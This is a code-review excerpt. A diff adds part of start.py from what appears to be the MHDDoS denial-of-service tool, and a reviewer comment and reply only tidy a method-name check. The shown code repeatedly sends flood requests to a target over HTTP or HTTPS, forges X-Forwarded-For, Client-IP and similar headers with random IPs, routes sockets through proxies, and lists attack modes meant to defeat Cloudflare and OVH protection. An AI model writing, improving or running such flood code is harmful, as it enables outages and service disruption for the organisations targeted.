tools/mhddos/start.py

```diff
@@ -0,0 +1,1194 @@
+        self._host_list = [self._host, self._target.authority]  # domain name and IP address
+        self._human_target = self._target.human_repr()
+        if self._target.scheme.lower() == "https":
+            self.open_connection = self._open_ssl_connection
+        else:
+            self.open_connection = self._open_connection
+
+    def select(self, name: str) -> None:
+        self.SENT_FLOOD = self.GET
+        for key, value in self.methods.items():
+            if name == key:
+                self.SENT_FLOOD = value
+
+    def run(self) -> None:
+        if self._synevent:
+            self._synevent.wait()
+        self.select(self._method)
+        while self._synevent.is_set():
+            self.SENT_FLOOD()
+
+    @property
+    def SpoofIP(self) -> str:
+        spoof: str = ProxyTools.Random.rand_ipv4()
+        return (
+            "X-Forwarded-Proto: Http\r\n"
+            f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
+            f"Via: {spoof}\r\n"
+            f"Client-IP: {spoof}\r\n"
+            f"X-Forwarded-For: {spoof}\r\n"
+            f"Real-IP: {spoof}\r\n"
+        )
+
+    def _get_host(self) -> str:
+        return randchoice(self._host_list)
+
+    def generate_payload(self, other: str = "") -> bytes:
+        return str.encode(
+            self._payload
+            + f"Host: {self._get_host()}\r\n"
+            + self.randHeadercontent
+            + other
+            + "\r\n"
+        )
+
+    def _open_connection(self, host: tuple[str, int] = None) -> socket:
+        # TODO probably we should use async socket here and does not use threads
+        sock = socket(AF_INET, SOCK_STREAM)
+        sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
+        sock.settimeout(0.9)
+
+        try:
+            sock.bind((random.choice(self._proxies), 0))
+        except IndexError:
+            # We must do nothing because we didn't set proxies
+            pass
+        sock.connect(host or self._raw_target)
+        return sock
+
+    def _open_ssl_connection(self, host: tuple[str, int] = None) -> socket:
+        return ctx.wrap_socket(
+            self._open_connection(host),
+            server_hostname=self._host,
+            server_side=False,
+            do_handshake_on_connect=True,
+            suppress_ragged_eofs=True,
+        )
+
+    @property
+    def randHeadercontent(self) -> str:
+        return (
+            f"User-Agent: {randchoice(self._useragents)}\r\n"
+            f"Referrer: {randchoice(self._referers)}{parse.quote(self._human_target)}\r\n"
+            + self.SpoofIP
+        )
+
+    @staticmethod
+    def getMethodType(method: str) -> str:
+        if {method.upper()} & {
+            "CFB",
+            "CFBUAM",
+            "GET",
+            "TOR",
+            "COOKIE",
+            "OVH",
+            "EVEN",
+            "DYN",
+            "SLOW",
+            "PPS",
+            "APACHE",
+            "BOT",
+            "RHEX",
+            "STOMP",
+        }:
```

Comment:
It’s clearer to write the check like this:  
```python  
if method.upper() in {'CFB', 'CFBUAM', ...}:  
    ...  
```  

Additionally, it’s better to define the set of possible values as a class attribute for reusability and maintainability. For example:  
```python  
class SomeClass:  
    VALID_METHODS = {'CFB', 'CFBUAM', ...}  

    def some_method(self, method):  
        if method.upper() in self.VALID_METHODS:  
            ...  
```

Reply:
I reworked using first proposal